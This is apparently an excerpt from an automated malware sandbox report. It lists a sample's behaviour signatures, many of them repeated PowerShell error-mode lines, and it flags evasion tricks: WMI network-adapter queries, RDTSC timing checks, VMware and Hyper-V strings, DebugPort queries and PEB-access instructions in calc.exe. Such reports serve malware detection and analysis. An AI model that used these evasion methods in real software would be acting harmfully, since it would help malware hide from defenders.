          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000001A98E4 second address: 00000000001A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000001A9B4E second address: 00000000001A9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00409A80 rdtsc 9_2_00409A80
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4706Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4066Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5884Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 4732Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000A.00000000.303017451.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000A.00000000.320295522.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000A.00000000.280926242.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000A.00000000.329155939.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00409A80 rdtsc 9_2_00409A80
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0040ACC0 LdrLoadDll,9_2_0040ACC0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478B58 mov eax, dword ptr fs:[00000030h]9_2_03478B58
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D3B7A mov eax, dword ptr fs:[00000030h]9_2_033D3B7A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D3B7A mov eax, dword ptr fs:[00000030h]9_2_033D3B7A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033ADB60 mov ecx, dword ptr fs:[00000030h]9_2_033ADB60
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0346131B mov eax, dword ptr fs:[00000030h]9_2_0346131B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AF358 mov eax, dword ptr fs:[00000030h]9_2_033AF358
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033ADB40 mov eax, dword ptr fs:[00000030h]9_2_033ADB40
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034253CA mov eax, dword ptr fs:[00000030h]9_2_034253CA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034253CA mov eax, dword ptr fs:[00000030h]9_2_034253CA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h]9_2_033D4BAD
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h]9_2_033D4BAD
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h]9_2_033D4BAD
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2397 mov eax, dword ptr fs:[00000030h]9_2_033D2397
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DB390 mov eax, dword ptr fs:[00000030h]9_2_033DB390
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B1B8F mov eax, dword ptr fs:[00000030h]9_2_033B1B8F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B1B8F mov eax, dword ptr fs:[00000030h]9_2_033B1B8F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345D380 mov ecx, dword ptr fs:[00000030h]9_2_0345D380
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0346138A mov eax, dword ptr fs:[00000030h]9_2_0346138A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CDBE9 mov eax, dword ptr fs:[00000030h]9_2_033CDBE9
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]9_2_033D03E2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]9_2_033D03E2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]9_2_033D03E2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]9_2_033D03E2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]9_2_033D03E2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]9_2_033D03E2
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03475BA5 mov eax, dword ptr fs:[00000030h]9_2_03475BA5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E4A2C mov eax, dword ptr fs:[00000030h]9_2_033E4A2C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E4A2C mov eax, dword ptr fs:[00000030h]9_2_033E4A2C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03434257 mov eax, dword ptr fs:[00000030h]9_2_03434257
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C3A1C mov eax, dword ptr fs:[00000030h]9_2_033C3A1C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345B260 mov eax, dword ptr fs:[00000030h]9_2_0345B260
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345B260 mov eax, dword ptr fs:[00000030h]9_2_0345B260
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478A62 mov eax, dword ptr fs:[00000030h]9_2_03478A62
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h]9_2_033A5210
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov ecx, dword ptr fs:[00000030h]9_2_033A5210
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h]9_2_033A5210
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h]9_2_033A5210
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AAA16 mov eax, dword ptr fs:[00000030h]9_2_033AAA16
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AAA16 mov eax, dword ptr fs:[00000030h]9_2_033AAA16
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B8A0A mov eax, dword ptr fs:[00000030h]9_2_033B8A0A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E927A mov eax, dword ptr fs:[00000030h]9_2_033E927A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]9_2_033A9240
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]9_2_033A9240
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]9_2_033A9240
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]9_2_033A9240
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BAAB0 mov eax, dword ptr fs:[00000030h]9_2_033BAAB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BAAB0 mov eax, dword ptr fs:[00000030h]9_2_033BAAB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DFAB0 mov eax, dword ptr fs:[00000030h]9_2_033DFAB0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]9_2_033A52A5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]9_2_033A52A5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]9_2_033A52A5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]9_2_033A52A5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]9_2_033A52A5
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DD294 mov eax, dword ptr fs:[00000030h]9_2_033DD294
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DD294 mov eax, dword ptr fs:[00000030h]9_2_033DD294
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2AE4 mov eax, dword ptr fs:[00000030h]9_2_033D2AE4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2ACB mov eax, dword ptr fs:[00000030h]9_2_033D2ACB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D513A mov eax, dword ptr fs:[00000030h]9_2_033D513A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D513A mov eax, dword ptr fs:[00000030h]9_2_033D513A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov ecx, dword ptr fs:[00000030h]9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h]9_2_033A9100
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h]9_2_033A9100
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h]9_2_033A9100
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB171 mov eax, dword ptr fs:[00000030h]9_2_033AB171
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB171 mov eax, dword ptr fs:[00000030h]9_2_033AB171
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC962 mov eax, dword ptr fs:[00000030h]9_2_033AC962
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CB944 mov eax, dword ptr fs:[00000030h]9_2_033CB944
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CB944 mov eax, dword ptr fs:[00000030h]9_2_033CB944
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D61A0 mov eax, dword ptr fs:[00000030h]9_2_033D61A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D61A0 mov eax, dword ptr fs:[00000030h]9_2_033D61A0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034341E8 mov eax, dword ptr fs:[00000030h]9_2_034341E8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2990 mov eax, dword ptr fs:[00000030h]9_2_033D2990
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA185 mov eax, dword ptr fs:[00000030h]9_2_033DA185
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CC182 mov eax, dword ptr fs:[00000030h]9_2_033CC182
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h]9_2_033AB1E1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h]9_2_033AB1E1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h]9_2_033AB1E1
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034269A6 mov eax, dword ptr fs:[00000030h]9_2_034269A6
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]9_2_034251BE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]9_2_034251BE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]9_2_034251BE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]9_2_034251BE
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]9_2_033D002D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]9_2_033D002D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]9_2_033D002D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]9_2_033D002D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]9_2_033D002D
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]9_2_033BB02A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]9_2_033BB02A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]9_2_033BB02A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]9_2_033BB02A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03471074 mov eax, dword ptr fs:[00000030h]9_2_03471074
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03462073 mov eax, dword ptr fs:[00000030h]9_2_03462073
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03474015 mov eax, dword ptr fs:[00000030h]9_2_03474015
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03474015 mov eax, dword ptr fs:[00000030h]9_2_03474015
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427016 mov eax, dword ptr fs:[00000030h]9_2_03427016
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427016 mov eax, dword ptr fs:[00000030h]9_2_03427016
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427016 mov eax, dword ptr fs:[00000030h]9_2_03427016
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C0050 mov eax, dword ptr fs:[00000030h]9_2_033C0050
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C0050 mov eax, dword ptr fs:[00000030h]9_2_033C0050
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DF0BF mov ecx, dword ptr fs:[00000030h]9_2_033DF0BF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DF0BF mov eax, dword ptr fs:[00000030h]9_2_033DF0BF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DF0BF mov eax, dword ptr fs:[00000030h]9_2_033DF0BF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E90AF mov eax, dword ptr fs:[00000030h]9_2_033E90AF
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]9_2_0343B8D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov ecx, dword ptr fs:[00000030h]9_2_0343B8D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]9_2_0343B8D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]9_2_0343B8D0
